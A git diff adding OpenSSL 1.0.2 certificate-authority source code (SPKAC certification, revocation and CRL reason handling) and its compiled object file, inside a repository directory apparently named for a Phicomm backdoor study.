+    BIO_printf(bp, "subject:%s\n", f);
+
+    BIO_puts(bp, "serial :");
+    i2a_ASN1_INTEGER(bp, x->cert_info->serialNumber);
+    BIO_puts(bp, "\n\n");
+#endif
+    if (!notext)
+        X509_print(bp, x);
+    PEM_write_bio_X509(bp, x);
+}
+
+static int certify_spkac(X509 **xret, char *infile, EVP_PKEY *pkey,
+                         X509 *x509, const EVP_MD *dgst,
+                         STACK_OF(OPENSSL_STRING) *sigopts,
+                         STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                         BIGNUM *serial, char *subj, unsigned long chtype,
+                         int multirdn, int email_dn, char *startdate,
+                         char *enddate, long days, char *ext_sect,
+                         CONF *lconf, int verbose, unsigned long certopt,
+                         unsigned long nameopt, int default_op, int ext_copy)
+{
+    STACK_OF(CONF_VALUE) *sk = NULL;
+    LHASH_OF(CONF_VALUE) *parms = NULL;
+    X509_REQ *req = NULL;
+    CONF_VALUE *cv = NULL;
+    NETSCAPE_SPKI *spki = NULL;
+    X509_REQ_INFO *ri;
+    char *type, *buf;
+    EVP_PKEY *pktmp = NULL;
+    X509_NAME *n = NULL;
+    X509_NAME_ENTRY *ne = NULL;
+    int ok = -1, i, j;
+    long errline;
+    int nid;
+
+    /*
+     * Load input file into a hash table.  (This is just an easy
+     * way to read and parse the file, then put it into a convenient
+     * STACK format).
+     */
+    parms = CONF_load(NULL, infile, &errline);
+    if (parms == NULL) {
+        BIO_printf(bio_err, "error on line %ld of %s\n", errline, infile);
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    sk = CONF_get_section(parms, "default");
+    if (sk_CONF_VALUE_num(sk) == 0) {
+        BIO_printf(bio_err, "no name/value pairs found in %s\n", infile);
+        CONF_free(parms);
+        goto err;
+    }
+
+    /*
+     * Now create a dummy X509 request structure.  We don't actually
+     * have an X509 request, but we have many of the components
+     * (a public key, various DN components).  The idea is that we
+     * put these components into the right X509 request structure
+     * and we can use the same code as if you had a real X509 request.
+     */
+    req = X509_REQ_new();
+    if (req == NULL) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    /*
+     * Build up the subject name set.
+     */
+    ri = req->req_info;
+    n = ri->subject;
+
+    for (i = 0;; i++) {
+        if (sk_CONF_VALUE_num(sk) <= i)
+            break;
+
+        cv = sk_CONF_VALUE_value(sk, i);
+        type = cv->name;
+        /*
+         * Skip past any leading X. X: X, etc to allow for multiple instances
+         */
+        for (buf = cv->name; *buf; buf++)
+            if ((*buf == ':') || (*buf == ',') || (*buf == '.')) {
+                buf++;
+                if (*buf)
+                    type = buf;
+                break;
+            }
+
+        buf = cv->value;
+        if ((nid = OBJ_txt2nid(type)) == NID_undef) {
+            if (strcmp(type, "SPKAC") == 0) {
+                spki = NETSCAPE_SPKI_b64_decode(cv->value, -1);
+                if (spki == NULL) {
+                    BIO_printf(bio_err,
+                               "unable to load Netscape SPKAC structure\n");
+                    ERR_print_errors(bio_err);
+                    goto err;
+                }
+            }
+            continue;
+        }
+
+        if (!X509_NAME_add_entry_by_NID(n, nid, chtype,
+                                        (unsigned char *)buf, -1, -1, 0))
+            goto err;
+    }
+    if (spki == NULL) {
+        BIO_printf(bio_err, "Netscape SPKAC structure not found in %s\n",
+                   infile);
+        goto err;
+    }
+
+    /*
+     * Now extract the key from the SPKI structure.
+     */
+
+    BIO_printf(bio_err,
+               "Check that the SPKAC request matches the signature\n");
+
+    if ((pktmp = NETSCAPE_SPKI_get_pubkey(spki)) == NULL) {
+        BIO_printf(bio_err, "error unpacking SPKAC public key\n");
+        goto err;
+    }
+
+    j = NETSCAPE_SPKI_verify(spki, pktmp);
+    if (j <= 0) {
+        BIO_printf(bio_err,
+                   "signature verification failed on SPKAC public key\n");
+        goto err;
+    }
+    BIO_printf(bio_err, "Signature ok\n");
+
+    X509_REQ_set_pubkey(req, pktmp);
+    EVP_PKEY_free(pktmp);
+    ok = do_body(xret, pkey, x509, dgst, sigopts, policy, db, serial, subj,
+                 chtype, multirdn, email_dn, startdate, enddate, days, 1,
+                 verbose, req, ext_sect, lconf, certopt, nameopt, default_op,
+                 ext_copy, 0);
+ err:
+    if (req != NULL)
+        X509_REQ_free(req);
+    if (parms != NULL)
+        CONF_free(parms);
+    if (spki != NULL)
+        NETSCAPE_SPKI_free(spki);
+    if (ne != NULL)
+        X509_NAME_ENTRY_free(ne);
+
+    return (ok);
+}
+
+static int check_time_format(const char *str)
+{
+    return ASN1_TIME_set_string(NULL, str);
+}
+
+static int do_revoke(X509 *x509, CA_DB *db, int type, char *value)
+{
+    ASN1_UTCTIME *tm = NULL;
+    char *row[DB_NUMBER], **rrow, **irow;
+    char *rev_str = NULL;
+    BIGNUM *bn = NULL;
+    int ok = -1, i;
+
+    for (i = 0; i < DB_NUMBER; i++)
+        row[i] = NULL;
+    row[DB_name] = X509_NAME_oneline(X509_get_subject_name(x509), NULL, 0);
+    bn = ASN1_INTEGER_to_BN(X509_get_serialNumber(x509), NULL);
+    if (!bn)
+        goto err;
+    if (BN_is_zero(bn))
+        row[DB_serial] = BUF_strdup("00");
+    else
+        row[DB_serial] = BN_bn2hex(bn);
+    BN_free(bn);
+    if ((row[DB_name] == NULL) || (row[DB_serial] == NULL)) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto err;
+    }
+    /*
+     * We have to lookup by serial number because name lookup skips revoked
+     * certs
+     */
+    rrow = TXT_DB_get_by_index(db->db, DB_serial, row);
+    if (rrow == NULL) {
+        BIO_printf(bio_err,
+                   "Adding Entry with serial number %s to DB for %s\n",
+                   row[DB_serial], row[DB_name]);
+
+        /* We now just add it to the database */
+        row[DB_type] = (char *)OPENSSL_malloc(2);
+
+        tm = X509_get_notAfter(x509);
+        row[DB_exp_date] = (char *)OPENSSL_malloc(tm->length + 1);
+        memcpy(row[DB_exp_date], tm->data, tm->length);
+        row[DB_exp_date][tm->length] = '\0';
+
+        row[DB_rev_date] = NULL;
+
+        /* row[DB_serial] done already */
+        row[DB_file] = (char *)OPENSSL_malloc(8);
+
+        /* row[DB_name] done already */
+
+        if ((row[DB_type] == NULL) || (row[DB_exp_date] == NULL) ||
+            (row[DB_file] == NULL)) {
+            BIO_printf(bio_err, "Memory allocation failure\n");
+            goto err;
+        }
+        BUF_strlcpy(row[DB_file], "unknown", 8);
+        row[DB_type][0] = 'V';
+        row[DB_type][1] = '\0';
+
+        if ((irow =
+             (char **)OPENSSL_malloc(sizeof(char *) * (DB_NUMBER + 1))) ==
+            NULL) {
+            BIO_printf(bio_err, "Memory allocation failure\n");
+            goto err;
+        }
+
+        for (i = 0; i < DB_NUMBER; i++) {
+            irow[i] = row[i];
+            row[i] = NULL;
+        }
+        irow[DB_NUMBER] = NULL;
+
+        if (!TXT_DB_insert(db->db, irow)) {
+            BIO_printf(bio_err, "failed to update database\n");
+            BIO_printf(bio_err, "TXT_DB error number %ld\n", db->db->error);
+            goto err;
+        }
+
+        /* Revoke Certificate */
+        if (type == -1)
+            ok = 1;
+        else
+            ok = do_revoke(x509, db, type, value);
+
+        goto err;
+
+    } else if (index_name_cmp_noconst(row, rrow)) {
+        BIO_printf(bio_err, "ERROR:name does not match %s\n", row[DB_name]);
+        goto err;
+    } else if (type == -1) {
+        BIO_printf(bio_err, "ERROR:Already present, serial number %s\n",
+                   row[DB_serial]);
+        goto err;
+    } else if (rrow[DB_type][0] == 'R') {
+        BIO_printf(bio_err, "ERROR:Already revoked, serial number %s\n",
+                   row[DB_serial]);
+        goto err;
+    } else {
+        BIO_printf(bio_err, "Revoking Certificate %s.\n", rrow[DB_serial]);
+        rev_str = make_revocation_str(type, value);
+        if (!rev_str) {
+            BIO_printf(bio_err, "Error in revocation arguments\n");
+            goto err;
+        }
+        rrow[DB_type][0] = 'R';
+        rrow[DB_type][1] = '\0';
+        rrow[DB_rev_date] = rev_str;
+    }
+    ok = 1;
+ err:
+    for (i = 0; i < DB_NUMBER; i++) {
+        if (row[i] != NULL)
+            OPENSSL_free(row[i]);
+    }
+    return (ok);
+}
+
+static int get_certificate_status(const char *serial, CA_DB *db)
+{
+    char *row[DB_NUMBER], **rrow;
+    int ok = -1, i;
+
+    /* Free Resources */
+    for (i = 0; i < DB_NUMBER; i++)
+        row[i] = NULL;
+
+    /* Malloc needed char spaces */
+    row[DB_serial] = OPENSSL_malloc(strlen(serial) + 2);
+    if (row[DB_serial] == NULL) {
+        BIO_printf(bio_err, "Malloc failure\n");
+        goto err;
+    }
+
+    if (strlen(serial) % 2) {
+        /*
+         * Set the first char to 0
+         */ ;
+        row[DB_serial][0] = '0';
+
+        /* Copy String from serial to row[DB_serial] */
+        memcpy(row[DB_serial] + 1, serial, strlen(serial));
+        row[DB_serial][strlen(serial) + 1] = '\0';
+    } else {
+        /* Copy String from serial to row[DB_serial] */
+        memcpy(row[DB_serial], serial, strlen(serial));
+        row[DB_serial][strlen(serial)] = '\0';
+    }
+
+    /* Make it Upper Case */
+    for (i = 0; row[DB_serial][i] != '\0'; i++)
+        row[DB_serial][i] = toupper((unsigned char)row[DB_serial][i]);
+
+    ok = 1;
+
+    /* Search for the certificate */
+    rrow = TXT_DB_get_by_index(db->db, DB_serial, row);
+    if (rrow == NULL) {
+        BIO_printf(bio_err, "Serial %s not present in db.\n", row[DB_serial]);
+        ok = -1;
+        goto err;
+    } else if (rrow[DB_type][0] == 'V') {
+        BIO_printf(bio_err, "%s=Valid (%c)\n",
+                   row[DB_serial], rrow[DB_type][0]);
+        goto err;
+    } else if (rrow[DB_type][0] == 'R') {
+        BIO_printf(bio_err, "%s=Revoked (%c)\n",
+                   row[DB_serial], rrow[DB_type][0]);
+        goto err;
+    } else if (rrow[DB_type][0] == 'E') {
+        BIO_printf(bio_err, "%s=Expired (%c)\n",
+                   row[DB_serial], rrow[DB_type][0]);
+        goto err;
+    } else if (rrow[DB_type][0] == 'S') {
+        BIO_printf(bio_err, "%s=Suspended (%c)\n",
+                   row[DB_serial], rrow[DB_type][0]);
+        goto err;
+    } else {
+        BIO_printf(bio_err, "%s=Unknown (%c).\n",
+                   row[DB_serial], rrow[DB_type][0]);
+        ok = -1;
+    }
+ err:
+    for (i = 0; i < DB_NUMBER; i++) {
+        if (row[i] != NULL)
+            OPENSSL_free(row[i]);
+    }
+    return (ok);
+}
+
+static int do_updatedb(CA_DB *db)
+{
+    ASN1_UTCTIME *a_tm = NULL;
+    int i, cnt = 0;
+    int db_y2k, a_y2k;          /* flags = 1 if y >= 2000 */
+    char **rrow, *a_tm_s;
+
+    a_tm = ASN1_UTCTIME_new();
+
+    /* get actual time and make a string */
+    a_tm = X509_gmtime_adj(a_tm, 0);
+    a_tm_s = (char *)OPENSSL_malloc(a_tm->length + 1);
+    if (a_tm_s == NULL) {
+        cnt = -1;
+        goto err;
+    }
+
+    memcpy(a_tm_s, a_tm->data, a_tm->length);
+    a_tm_s[a_tm->length] = '\0';
+
+    if (strncmp(a_tm_s, "49", 2) <= 0)
+        a_y2k = 1;
+    else
+        a_y2k = 0;
+
+    for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+        rrow = sk_OPENSSL_PSTRING_value(db->db->data, i);
+
+        if (rrow[DB_type][0] == 'V') {
+            /* ignore entries that are not valid */
+            if (strncmp(rrow[DB_exp_date], "49", 2) <= 0)
+                db_y2k = 1;
+            else
+                db_y2k = 0;
+
+            if (db_y2k == a_y2k) {
+                /* all on the same y2k side */
+                if (strcmp(rrow[DB_exp_date], a_tm_s) <= 0) {
+                    rrow[DB_type][0] = 'E';
+                    rrow[DB_type][1] = '\0';
+                    cnt++;
+
+                    BIO_printf(bio_err, "%s=Expired\n", rrow[DB_serial]);
+                }
+            } else if (db_y2k < a_y2k) {
+                rrow[DB_type][0] = 'E';
+                rrow[DB_type][1] = '\0';
+                cnt++;
+
+                BIO_printf(bio_err, "%s=Expired\n", rrow[DB_serial]);
+            }
+
+        }
+    }
+
+ err:
+
+    ASN1_UTCTIME_free(a_tm);
+    OPENSSL_free(a_tm_s);
+
+    return (cnt);
+}
+
+static const char *crl_reasons[] = {
+    /* CRL reason strings */
+    "unspecified",
+    "keyCompromise",
+    "CACompromise",
+    "affiliationChanged",
+    "superseded",
+    "cessationOfOperation",
+    "certificateHold",
+    "removeFromCRL",
+    /* Additional pseudo reasons */
+    "holdInstruction",
+    "keyTime",
+    "CAkeyTime"
+};
+
+#define NUM_REASONS (sizeof(crl_reasons) / sizeof(char *))
+
+/*
+ * Given revocation information convert to a DB string. The format of the
+ * string is: revtime[,reason,extra]. Where 'revtime' is the revocation time
+ * (the current time). 'reason' is the optional CRL reason and 'extra' is any
+ * additional argument
+ */
+
+char *make_revocation_str(int rev_type, char *rev_arg)
+{
+    char *other = NULL, *str;
+    const char *reason = NULL;
+    ASN1_OBJECT *otmp;
+    ASN1_UTCTIME *revtm = NULL;
+    int i;
+    switch (rev_type) {
+    case REV_NONE:
+        break;
+
+    case REV_CRL_REASON:
+        for (i = 0; i < 8; i++) {
+            if (!strcasecmp(rev_arg, crl_reasons[i])) {
+                reason = crl_reasons[i];
+                break;
+            }
+        }
+        if (reason == NULL) {
+            BIO_printf(bio_err, "Unknown CRL reason %s\n", rev_arg);
+            return NULL;
+        }
+        break;
+
+    case REV_HOLD:
+        /* Argument is an OID */
+
+        otmp = OBJ_txt2obj(rev_arg, 0);
+        ASN1_OBJECT_free(otmp);
+
+        if (otmp == NULL) {
+            BIO_printf(bio_err, "Invalid object identifier %s\n", rev_arg);
+            return NULL;
+        }
+
+        reason = "holdInstruction";
+        other = rev_arg;
+        break;
+
+    case REV_KEY_COMPROMISE:
+    case REV_CA_COMPROMISE:
+
+        /* Argument is the key compromise time  */
+        if (!ASN1_GENERALIZEDTIME_set_string(NULL, rev_arg)) {
+            BIO_printf(bio_err,
+                       "Invalid time format %s. Need YYYYMMDDHHMMSSZ\n",
+                       rev_arg);
+            return NULL;
+        }
+        other = rev_arg;
+        if (rev_type == REV_KEY_COMPROMISE)
+            reason = "keyTime";
+        else
+            reason = "CAkeyTime";
+
+        break;
+
+    }
+
+    revtm = X509_gmtime_adj(NULL, 0);
+
+    if (!revtm)
+        return NULL;
+
+    i = revtm->length + 1;
+
+    if (reason)
+        i += strlen(reason) + 1;
+    if (other)
+        i += strlen(other) + 1;
+
+    str = OPENSSL_malloc(i);
+
+    if (!str)
+        return NULL;
+
+    BUF_strlcpy(str, (char *)revtm->data, i);
+    if (reason) {
+        BUF_strlcat(str, ",", i);
+        BUF_strlcat(str, reason, i);
+    }
+    if (other) {
+        BUF_strlcat(str, ",", i);
+        BUF_strlcat(str, other, i);
+    }
+    ASN1_UTCTIME_free(revtm);
+    return str;
+}
+
+/*-
+ * Convert revocation field to X509_REVOKED entry
+ * return code:
+ * 0 error
+ * 1 OK
+ * 2 OK and some extensions added (i.e. V2 CRL)
+ */
+
+int make_revoked(X509_REVOKED *rev, const char *str)
+{
+    char *tmp = NULL;
+    int reason_code = -1;
+    int i, ret = 0;
+    ASN1_OBJECT *hold = NULL;
+    ASN1_GENERALIZEDTIME *comp_time = NULL;
+    ASN1_ENUMERATED *rtmp = NULL;
+
+    ASN1_TIME *revDate = NULL;
+
+    i = unpack_revinfo(&revDate, &reason_code, &hold, &comp_time, str);
+
+    if (i == 0)
+        goto err;
+
+    if (rev && !X509_REVOKED_set_revocationDate(rev, revDate))
+        goto err;
+
+    if (rev && (reason_code != OCSP_REVOKED_STATUS_NOSTATUS)) {
+        rtmp = ASN1_ENUMERATED_new();
+        if (!rtmp || !ASN1_ENUMERATED_set(rtmp, reason_code))
+            goto err;
+        if (!X509_REVOKED_add1_ext_i2d(rev, NID_crl_reason, rtmp, 0, 0))
+            goto err;
+    }
+
+    if (rev && comp_time) {
+        if (!X509_REVOKED_add1_ext_i2d
+            (rev, NID_invalidity_date, comp_time, 0, 0))
+            goto err;
+    }
+    if (rev && hold) {
+        if (!X509_REVOKED_add1_ext_i2d
+            (rev, NID_hold_instruction_code, hold, 0, 0))
+            goto err;
+    }
+
+    if (reason_code != OCSP_REVOKED_STATUS_NOSTATUS)
+        ret = 2;
+    else
+        ret = 1;
+
+ err:
+
+    if (tmp)
+        OPENSSL_free(tmp);
+    ASN1_OBJECT_free(hold);
+    ASN1_GENERALIZEDTIME_free(comp_time);
+    ASN1_ENUMERATED_free(rtmp);
+    ASN1_TIME_free(revDate);
+
+    return ret;
+}
+
+int old_entry_print(BIO *bp, ASN1_OBJECT *obj, ASN1_STRING *str)
+{
+    char buf[25], *pbuf, *p;
+    int j;
+    j = i2a_ASN1_OBJECT(bp, obj);
+    pbuf = buf;
+    for (j = 22 - j; j > 0; j--)
+        *(pbuf++) = ' ';
+    *(pbuf++) = ':';
+    *(pbuf++) = '\0';
+    BIO_puts(bp, buf);
+
+    if (str->type == V_ASN1_PRINTABLESTRING)
+        BIO_printf(bp, "PRINTABLE:'");
+    else if (str->type == V_ASN1_T61STRING)
+        BIO_printf(bp, "T61STRING:'");
+    else if (str->type == V_ASN1_IA5STRING)
+        BIO_printf(bp, "IA5STRING:'");
+    else if (str->type == V_ASN1_UNIVERSALSTRING)
+        BIO_printf(bp, "UNIVERSALSTRING:'");
+    else
+        BIO_printf(bp, "ASN.1 %2d:'", str->type);
+
+    p = (char *)str->data;
+    for (j = str->length; j > 0; j--) {
+        if ((*p >= ' ') && (*p <= '~'))
+            BIO_printf(bp, "%c", *p);
+        else if (*p & 0x80)
+            BIO_printf(bp, "\\0x%02X", *p);
+        else if ((unsigned char)*p == 0xf7)
+            BIO_printf(bp, "^?");
+        else
+            BIO_printf(bp, "^%c", *p + '@');
+        p++;
+    }
+    BIO_printf(bp, "'\n");
+    return 1;
+}
+
+int unpack_revinfo(ASN1_TIME **prevtm, int *preason, ASN1_OBJECT **phold,
+                   ASN1_GENERALIZEDTIME **pinvtm, const char *str)
+{
+    char *tmp = NULL;
+    char *rtime_str, *reason_str = NULL, *arg_str = NULL, *p;
+    int reason_code = -1;
+    int ret = 0;
+    unsigned int i;
+    ASN1_OBJECT *hold = NULL;
+    ASN1_GENERALIZEDTIME *comp_time = NULL;
+    tmp = BUF_strdup(str);
+
+    p = strchr(tmp, ',');
+
+    rtime_str = tmp;
+
+    if (p) {
+        *p = '\0';
+        p++;
+        reason_str = p;
+        p = strchr(p, ',');
+        if (p) {
+            *p = '\0';
+            arg_str = p + 1;
+        }
+    }
+
+    if (prevtm) {
+        *prevtm = ASN1_UTCTIME_new();
+        if (!ASN1_UTCTIME_set_string(*prevtm, rtime_str)) {
+            BIO_printf(bio_err, "invalid revocation date %s\n", rtime_str);
+            goto err;
+        }
+    }
+    if (reason_str) {
+        for (i = 0; i < NUM_REASONS; i++) {
+            if (!strcasecmp(reason_str, crl_reasons[i])) {
+                reason_code = i;
+                break;
+            }
+        }
+        if (reason_code == OCSP_REVOKED_STATUS_NOSTATUS) {
+            BIO_printf(bio_err, "invalid reason code %s\n", reason_str);
+            goto err;
+        }
+
+        if (reason_code == 7)
+            reason_code = OCSP_REVOKED_STATUS_REMOVEFROMCRL;
+        else if (reason_code == 8) { /* Hold instruction */
+            if (!arg_str) {
+                BIO_printf(bio_err, "missing hold instruction\n");
+                goto err;
+            }
+            reason_code = OCSP_REVOKED_STATUS_CERTIFICATEHOLD;
+            hold = OBJ_txt2obj(arg_str, 0);
+
+            if (!hold) {
+                BIO_printf(bio_err, "invalid object identifier %s\n",
+                           arg_str);
+                goto err;
+            }
+            if (phold)
+                *phold = hold;
+        } else if ((reason_code == 9) || (reason_code == 10)) {
+            if (!arg_str) {
+                BIO_printf(bio_err, "missing compromised time\n");
+                goto err;
+            }
+            comp_time = ASN1_GENERALIZEDTIME_new();
+            if (!ASN1_GENERALIZEDTIME_set_string(comp_time, arg_str)) {
+                BIO_printf(bio_err, "invalid compromised time %s\n", arg_str);
+                goto err;
+            }
+            if (reason_code == 9)
+                reason_code = OCSP_REVOKED_STATUS_KEYCOMPROMISE;
+            else
+                reason_code = OCSP_REVOKED_STATUS_CACOMPROMISE;
+        }
+    }
+
+    if (preason)
+        *preason = reason_code;
+    if (pinvtm)
+        *pinvtm = comp_time;
+    else
+        ASN1_GENERALIZEDTIME_free(comp_time);
+
+    ret = 1;
+
+ err:
+
+    if (tmp)
+        OPENSSL_free(tmp);
+    if (!phold)
+        ASN1_OBJECT_free(hold);
+    if (!pinvtm)
+        ASN1_GENERALIZEDTIME_free(comp_time);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.o
new file mode 100644
index 0000000000000000000000000000000000000000..385094dbec2701c19211da67ffd476cd387be4fc
GIT binary patch
literal 78160
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
